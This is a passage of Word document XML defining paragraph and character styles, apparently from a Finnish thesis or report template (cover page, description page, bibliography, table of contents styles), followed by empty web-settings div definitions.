      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="KuvailulehtinormaaliChar" w:customStyle="1">
    <w:name w:val="Kuvailulehti_normaali Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Kuvailulehtinormaali"/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlinkki">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00390AE8"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="0D004C"/>
      <w:sz w:val="24"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Luettelokappale">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normaali"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003E0724"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sisllysluettelonotsikko">
    <w:name w:val="TOC Heading"/>
    <w:next w:val="Normaali"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00D2427A"/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorHAnsi"/>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sisluet1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Otsikko1"/>
    <w:next w:val="Normaali"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009946BB"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="480"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="100" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sisluet2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009946BB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="709"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="170"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sisluet3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C22D4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1276"/>
        <w:tab w:val="left" w:pos="1783"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="397"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kuvaotsikkoluettelo">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CA77C5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="LhteetOtsikko" w:customStyle="1">
    <w:name w:val="Lähteet_Otsikko"/>
    <w:next w:val="Lhdeluettelo"/>
    <w:qFormat/>
    <w:rsid w:val="00974F3E"/>
    <w:pPr>
      <w:spacing w:before="480" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Erottuvalainaus">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="ErottuvalainausChar"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="003D3422"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="E2066E" w:themeColor="accent1" w:sz="4" w:space="10"/>
        <w:bottom w:val="single" w:color="E2066E" w:themeColor="accent1" w:sz="4" w:space="10"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="360"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Liitteetotsikko2" w:customStyle="1">
    <w:name w:val="Liitteet_otsikko_2"/>
    <w:next w:val="Normaali"/>
    <w:qFormat/>
    <w:rsid w:val="001C3C89"/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Kommentinviite">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D332D"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kommentinteksti">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normaali"/>
    <w:link w:val="KommentintekstiChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D332D"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="KommentintekstiChar" w:customStyle="1">
    <w:name w:val="Kommentin teksti Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Kommentinteksti"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D332D"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kommentinotsikko">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Kommentinteksti"/>
    <w:next w:val="Kommentinteksti"/>
    <w:link w:val="KommentinotsikkoChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D332D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="KommentinotsikkoChar" w:customStyle="1">
    <w:name w:val="Kommentin otsikko Char"/>
    <w:basedOn w:val="KommentintekstiChar"/>
    <w:link w:val="Kommentinotsikko"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D332D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Seliteteksti">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normaali"/>
    <w:link w:val="SelitetekstiChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D332D"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SelitetekstiChar" w:customStyle="1">
    <w:name w:val="Seliteteksti Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Seliteteksti"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D332D"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kuvailulehtitiivistelm" w:customStyle="1">
    <w:name w:val="Kuvailulehti_tiivistelmä"/>
    <w:link w:val="KuvailulehtitiivistelmChar"/>
    <w:qFormat/>
    <w:rsid w:val="00100B3E"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="KuvailulehtitiivistelmChar" w:customStyle="1">
    <w:name w:val="Kuvailulehti_tiivistelmä Char"/>
    <w:basedOn w:val="KuvailulehtinormaaliChar"/>
    <w:link w:val="Kuvailulehtitiivistelm"/>
    <w:rsid w:val="00100B3E"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kuvaotsikko">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F859C9"/>
    <w:rPr>
      <w:bCs/>
      <w:iCs/>
      <w:noProof/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Otsikko">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Kansilehtialanimi"/>
    <w:link w:val="OtsikkoChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00893194"/>
    <w:pPr>
      <w:spacing w:before="3120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1276"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="OtsikkoChar" w:customStyle="1">
    <w:name w:val="Otsikko Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Otsikko"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00893194"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Alaotsikko">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normaali"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="AlaotsikkoChar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00880298"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="AlaotsikkoChar" w:customStyle="1">
    <w:name w:val="Alaotsikko Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Alaotsikko"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00880298"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lainaus">
    <w:name w:val="Quote"/>
    <w:next w:val="Normaali"/>
    <w:link w:val="LainausChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00560194"/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1304"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="LainausChar" w:customStyle="1">
    <w:name w:val="Lainaus Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Lainaus"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00560194"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="AvattuHyperlinkki">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E6EC1"/>
    <w:rPr>
      <w:color w:val="7861A8" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kansilehtialanimi" w:customStyle="1">
    <w:name w:val="Kansilehti_alanimi"/>
    <w:qFormat/>
    <w:rsid w:val="00CA1851"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kansilehtitekij2" w:customStyle="1">
    <w:name w:val="Kansilehti_tekijä_2"/>
    <w:next w:val="KansilehtiOpintotiedot"/>
    <w:qFormat/>
    <w:rsid w:val="00422958"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="3600"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="KansilehtiOpintotiedot" w:customStyle="1">
    <w:name w:val="Kansilehti_Opintotiedot"/>
    <w:qFormat/>
    <w:rsid w:val="00CA1851"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="KuvailulehtiOtsikko" w:customStyle="1">
    <w:name w:val="Kuvailulehti_Otsikko"/>
    <w:qFormat/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kuvailulehtitiedotkorostettu" w:customStyle="1">
    <w:name w:val="Kuvailulehti_tiedot_korostettu"/>
    <w:qFormat/>
    <w:rsid w:val="008C3364"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lhdeluettelo">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Eivli"/>
    <w:rsid w:val="00A46B18"/>
    <w:pPr>
      <w:spacing w:after="320"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TaulukkoRuudukko">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Normaalitaulukko"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="000F524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rottuvalainausChar" w:customStyle="1">
    <w:name w:val="Erottuva lainaus Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Erottuvalainaus"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Erottuvaviittaus">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="5"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hienovarainenkorostus">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hienovarainenviittaus">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="31"/>
    <w:qFormat/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:smallCaps/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kappaleotsikko" w:customStyle="1">
    <w:name w:val="Kappaleotsikko"/>
    <w:basedOn w:val="Otsikko4"/>
    <w:rsid w:val="00F859C9"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="360" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kuvailulehtiasiasanatmuuttiedot" w:customStyle="1">
    <w:name w:val="Kuvailulehti_asiasanat_muut tiedot"/>
    <w:basedOn w:val="Kuvailulehtitiedotkorostettu"/>
    <w:qFormat/>
    <w:rsid w:val="00690C1F"/>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kuvailulehtitiedotnormaali" w:customStyle="1">
    <w:name w:val="Kuvailulehti_tiedot_normaali"/>
    <w:basedOn w:val="Kuvailulehtitiedotkorostettu"/>
    <w:qFormat/>
    <w:rsid w:val="00E47B26"/>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Paikkamerkkiteksti">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002417F0"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ratkaisematonmaininta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D2BDC"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Luettelo3">
    <w:name w:val="List 3"/>
    <w:basedOn w:val="Normaali"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A67A4F"/>
    <w:pPr>
      <w:ind w:left="849" w:hanging="283"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Alaviitteenteksti">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normaali"/>
    <w:link w:val="AlaviitteentekstiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C02995"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="AlaviitteentekstiChar" w:customStyle="1">
    <w:name w:val="Alaviitteen teksti Char"/>
    <w:basedOn w:val="Kappaleenoletusfontti"/>
    <w:link w:val="Alaviitteenteksti"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C02995"/>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sisllysluettelootsikko" w:customStyle="1">
    <w:name w:val="Sisällysluettelo otsikko"/>
    <w:basedOn w:val="Sisllysluettelonotsikko"/>
    <w:qFormat/>
    <w:rsid w:val="00FF4C28"/>
    <w:pPr>
      <w:spacing w:before="360"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Merkittyluettelo4">
    <w:name w:val="List Bullet 4"/>
    <w:basedOn w:val="Normaali"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BC1473"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="36"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1208" w:hanging="357"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Numeroituluettelo4">
    <w:name w:val="List Number 4"/>
    <w:basedOn w:val="Normaali"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001C3C89"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="41"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1208" w:hanging="357"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Merkittyluettelo">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normaali"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0001273A"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="33"/>
      </w:numPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="357" w:hanging="357"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="LiiteOtsikko" w:customStyle="1">
    <w:name w:val="LiiteOtsikko"/>
    <w:basedOn w:val="LhteetOtsikko"/>
    <w:next w:val="Liitteetotsikko2"/>
    <w:qFormat/>
    <w:rsid w:val="001C3C89"/>
    <w:pPr>
      <w:spacing w:before="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kansilehtitekij1" w:customStyle="1">
    <w:name w:val="Kansilehti_tekijä_1"/>
    <w:basedOn w:val="Kansilehtitekij2"/>
    <w:next w:val="Kansilehtitekij2"/>
    <w:rsid w:val="003772DD"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Eivli">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:locked/>
    <w:rsid w:val="00F859C9"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Kansilehtiyksitekij" w:customStyle="1">
    <w:name w:val="Kansilehti_yksi tekijä"/>
    <w:basedOn w:val="Kansilehtitekij2"/>
    <w:next w:val="KansilehtiOpintotiedot"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6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8432632">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="767391726">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1093210141">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="139810802">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="340742391">
